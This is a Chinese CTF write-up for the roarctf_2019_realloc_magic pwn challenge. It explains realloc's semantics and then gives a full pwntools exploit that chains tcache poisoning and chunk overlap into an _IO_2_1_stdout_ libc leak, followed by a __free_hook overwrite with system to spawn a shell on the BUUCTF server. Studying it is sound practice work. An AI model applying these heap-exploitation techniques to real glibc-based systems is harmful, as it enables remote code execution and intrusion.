roarctf_2019_realloc_magic

realloc的特点

他的基础功能是改变mem_address所指内存区域的大小为newsize长度。这里就有几种不同的情况
1.当size为0,这时就相当于free()函数,同时返回值为null
2.当指针为0,size大于0,相当于malloc函数
3.size小于等于原来的size,则在原先的基础上缩小,多余的free掉
4.size大于原来的size,如果有空间就原基础扩充,空间不足则分配新的内存,将内容复制到新的内存中,然后再将原来的内存free掉。

思路

1.首先填满tcache,再次free一个chunk让其进入unsorted bin,这样可以在fd处踩出main_arena的地址,然后我们通过ovarlap修改fd为_IO_2_1_stdout_的地址(需要爆破一位)
2.接下来跟fast bin attack相似,我们malloc两次即可分配到_IO_2_1_stdout_处的内存(这里其中一个堆块设置为0x41,这样free后他就不会回到原来的tcache)
3.修改内存为p64(0xfbad1887)+p64(0)*3+p8(0x58)(至于这个原理,可以参考ex师傅和railgun师傅的博客,链接地址放在博客的后面),当程序再次调用puts时,就会泄露libc上的地址
4.接下来故技重施,将chunk分配到free_hook处,改free_hook为system地址,同时给上"/bin/sh",再次调用free函数即可拿shell

exp

from pwn import *

#r = remote("node3.buuoj.cn", 25009)
#r = process("./roarctf_2019_realloc_magic")


elf = ELF("./roarctf_2019_realloc_magic")
libc = ELF('./libc/libc-2.27.so')

def realloc(size, content):
	r.recvuntil(">> ")
	r.sendline('1')
	r.recvuntil("Size?\n")
	r.sendline(str(size))
	r.recvuntil("Content?\n")
	r.send(content)

def delete():
	r.recvuntil(">> ")
	r.sendline('2')

def back():
	r.recvuntil(">> ")
	r.sendline('666')


def pwn():
    realloc(0x70,'a')
    realloc(0,'')
    realloc(0x100,'b')
    realloc(0,'')
    realloc(0xa0,'c')
    realloc(0,'')

    realloc(0x100,'b')
    [delete() for i in range(7)] #fill tcache
    realloc(0,'') #to unsortbin fd->arena
    realloc(0x70,'a')
    realloc(0x180,'c'*0x78+p64(0x41)+p8(0x60)+p8(0x87))#overlap

    realloc(0,'')
    realloc(0x100,'a')
    realloc(0,'')
    realloc(0x100,p64(0xfbad1887)+p64(0)*3+p8(0x58))#get _IO_2_1_stdout_  change flag and write_base

    #get_libc
    libc_base = u64(r.recvuntil("\x7f",timeout=0.1)[-6:].ljust(8,'\x00'))-0x3e82a0 # _IO_2_1_stderr_+216 store _IO_file_jumps
    if libc_base == -0x3e82a0:
        exit(-1)
    print(hex(libc_base))
    free_hook=libc_base+libc.sym['__free_hook']
    system = libc_base + libc.sym['system']
    one_gadget=libc_base + 0x4f322

    r.sendline('666')
    realloc(0x120,'a')
    realloc(0,'')
    realloc(0x130,'a')
    realloc(0,'')
    realloc(0x170,'a')
    realloc(0,'')

    realloc(0x130,'a')
    [delete() for i in range(7)]
    realloc(0,'')

    realloc(0x120,'a')
    realloc(0x260,'a'*0x128+p64(0x41)+p64(free_hook-8))
    realloc(0,'')
    realloc(0x130,'a')
    realloc(0,'')
    realloc(0x130,'/bin/sh\x00'+p64(system))
    delete()

    r.interactive()


if __name__ == "__main__":
    while True:
        r = remote("node3.buuoj.cn", 29425)
        try:
            pwn()
        except:
            r.close()

感谢railgun师傅的指点!

内容来源

ex_利用 IO_2_1_stdout 泄露信息
railgun_探究利用_IO_2_1_stdout_ 泄露libc
BUUCTF-PWN roarctf_2019_realloc_magic

posted @ 2020-08-02 22:01  PwnKi  阅读(655)  评论(0编辑  收藏  举报